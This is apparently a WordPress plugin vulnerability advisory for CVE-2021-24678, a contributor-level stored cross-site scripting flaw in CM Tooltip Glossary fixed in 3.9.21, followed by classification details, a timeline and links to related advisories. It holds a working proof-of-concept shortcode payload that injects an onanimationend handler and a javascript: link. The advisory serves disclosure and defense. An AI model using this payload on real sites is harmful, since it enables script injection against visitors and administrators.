CM Tooltip Glossary < 3.9.21 – Contributor+ Stored Cross-Site Scripting | CVE 2021-24678 | Plugin Vulnerabilities

Description

The plugin does not escape some glossary_tooltip shortcode attributes, which could allow users a role as low as Contributor to perform Stored Cross-Site Scripting attacks

Proof of Concept

[glossary_tooltip dashicon='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS-enhanced-tooltipglossary_dashicon/)//' link="javascript:alert(/XSS-enhanced-tooltipglossary_link/)"]Click me[/glossary_tooltip]

Affects Plugins

enhanced-tooltipglossary

Fixed in 3.9.21

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

b83880f7-8614-4409-9305-d059b5df15dd

Timeline

Publicly Published

2021-09-06 (about 4 years ago)

Added

2021-09-06 (about 4 years ago)

Last Updated

2023-01-29 (about 2 years ago)

Other

Published

Title

Published

2020-05-04

Title

wpForo < 1.7.0 - Reflected Cross-Site Scripting (XSS) via User Agent

Published

2023-12-05

Title

Smart External Link Click Monitor [Link Log] <= 5.0.2 - Reflected Cross-Site Scripting

Published

2024-12-11

Title

Integrate Firebase < 0.10.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2014-12-08

Title

Wordfence <= 5.1.4 - Cross-Site Scripting (XSS)

Published

2024-02-12

Title

Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders < 5.9.9 - Contributor+ Stored Cross-Site Scripting via Filterable Gallery